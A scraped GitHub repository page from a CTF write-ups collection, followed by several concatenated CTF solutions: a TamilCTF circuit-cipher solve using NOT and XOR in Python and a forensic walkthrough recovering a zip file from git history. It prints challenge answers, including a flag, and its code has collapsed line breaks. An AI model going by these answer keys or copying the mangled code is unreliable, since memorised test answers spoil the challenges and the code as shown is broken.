<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
3 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/0xM4hm0ud/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path></svg> <span>More</span> </div></summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights
</details-menu></div></details></div></nav> </div>
<div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " >
<div> <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/0xM4hm0ud/CTF-Writeups/refs" cache-key="v0:1629839176.279113" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="MHhNNGhtMHVkL0NURi1Xcml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>Triple Dimple Easy Squish<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>TamilCTF</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>Triple Dimple Easy Squish<span>/</span></div>
<div class="Box mb-3"> <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-1 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/0xM4hm0ud/CTF-Writeups/tree-commit/5faa6be3bf621dedae87b3ed4df6a094896d7b42/TamilCTF/Crypto/Triple%20Dimple%20Easy%20Squish" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path fill-rule="evenodd" d="M1.643 3.143L.427 1.927A.25.25 0 000 2.104V5.75c0 .138.112.25.25.25h3.646a.25.25 0 00.177-.427L2.715 4.215a6.5 6.5 0 11-1.18 4.458.75.75 0 10-1.493.154 8.001 8.001 0 101.6-5.684zM7.75 4a.75.75 0 01.75.75v2.992l2.028.812a.75.75 0 01-.557 1.392l-2.5-1A.75.75 0 017 8.25v-3.5A.75.75 0 017.75 4z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/0xM4hm0ud/CTF-Writeups/file-list/main/TamilCTF/Crypto/Triple%20Dimple%20Easy%20Squish"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details"> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block" data-pjax> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-icon-tertiary"> <path fill-rule="evenodd" d="M3.75 1.5a.25.25 0 00-.25.25v11.5c0 .138.112.25.25.25h8.5a.25.25 0 00.25-.25V6H9.75A1.75 1.75 0 018 4.25V1.5H3.75zm5.75.56v2.19c0 .138.112.25.25.25h2.19L9.5 2.06zM2 1.75C2 .784 2.784 0 3.75 0h5.086c.464 0 .909.184 1.237.513l3.414 3.414c.329.328.513.773.513 1.237v8.086A1.75 1.75 0 0112.25 15h-8.5A1.75 1.75 0 012 13.25V1.75z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>flag.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
Software engineering for some beginner level crypto, challenge is doing it fast.
Writeup: [https://ctf.rip/write-ups/crypto/csaw-gottadecrypt/](https://ctf.rip/write-ups/crypto/csaw-gottadecrypt/) |
 [digital_play.zip](https://github.com/Rookie441/CTF/files/7236565/digital_play.zip)
> Open the .dig file using [Digital](https://github.com/hneemann/Digital/releases/latest/download/Digital.zip). Clone the repo and run command `java -jar Digital.jar`
> Here, we can see the key to be `0x4d415253` as well as a circuit diagram of 9 XOR gates and 5 NOT gates

> The enc.txt file is in binary format, so we will need to convert them to hex and `XOR` it with the key. Before that, we need to `NOT` Ciph 1,3,5,7,9 which are the odd Ciphs.
```00110110111111100000011000101 100001000000100000011000010101 001001111110101001110011001011 1111100000101010000110100010000 011011111011001110111011011001 1111100000101010110011100001100 010011111011001100100011110011 1100001101100001011101100110 0000010111100111100100011010001```
> This is the code to `NOT` the odd Ciphs and convert to hex format:
```pythonenc = ["00110110111111100000011000101","100001000000100000011000010101","001001111110101001110011001011","1111100000101010000110100010000","011011111011001110111011011001","1111100000101010110011100001100","010011111011001100100011110011","1100001101100001011101100110","0000010111100111100100011010001"]
def flip(text): binstring = "" for i in text: if i == "1": binstring+="0" elif i == "0": binstring+="1" return binstring
#flip 1,3,5,7,9enc_new = []for i in range(len(enc)): if i%2 == 0: enc_new.append(flip(enc[i])) else: enc_new.append(enc[i])
#convert to hex strings enc_hex = []for binary in enc_new: enc_hex.append((hex(int(binary, 2))))print(enc_hex)```
> The output is a list of hexadecimal strings.
```['0x19203f3a', '0x21020615', '0x36056334', '0x7c150d10', '0x24131126', '0x7c15670c', '0x2c13370c', '0xc361766', '0x7d0c372e']```
> Store them in a list of hexadecimal numbers and `XOR` with the key to get the flag.
```pythonkey = 0x4d415253c = [0x19203f3a, 0x21020615, 0x36056334, 0x7c150d10, 0x24131126, 0x7c15670c, 0x2c13370c, 0xc361766, 0x7d0c372e]print(b"".join(bytes.fromhex(hex(key ^ i)[2:]) for i in c).decode("utf-8"))```
`TamilCTF{D1g1T_CiRCu1T5_aRe_AwE50Me}` |
### GOT Happens Tamil CTF task writeup
[task file](files/got_happens.zip)
Open archive and check chall.txt file```Got Is EveryWhere! and clone the repo "0xcyberpj/got-test"```
Check repository online [github repository](https://github.com/0xcyberpj/got-test) (here is cloned copy[got-test.tar.gz](files/got-test.tar.gz))
Check what we have in commits historyreverse it but it's a fake flag, so move forwardlooks that we got something useful, trying to decode from hex, see base64 data but decoding gives nothing useful, so remembering that fake flag was reversed trying to reverse base64 text.So now it looks better and contains some visible PKZip header signaturesCyber chef is useful for playing with various transformations
Now time to play with unpackers and zip recovery tools, but no luck.Try to check what signatures we have. I used [The structure of a PKZip file](https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html) for that and hex editor.010 Editor for mac or Synalyze It! for windows are great tools to work with binary files with formats but they costs money, so I use trial version of 010 Editor
Check main file header ```\x50\x4b\x03\x04``` and found that it is located at the bottom of file

Ok, let check that block structure, we can apply file template by offset
Let specify offset 0x9F
But template fails and we got error on parsing extrafields
Ok, let try to check it manually and we see that we have 5 bytes missing
let try to find next block which has ```\x50\x4b\x01\x02``` signature

but as we can see we have not full data again broken in the middle of timestamp extra field```id=0x5455``` but we see that out file started with undefined signature but it fits to end of that block
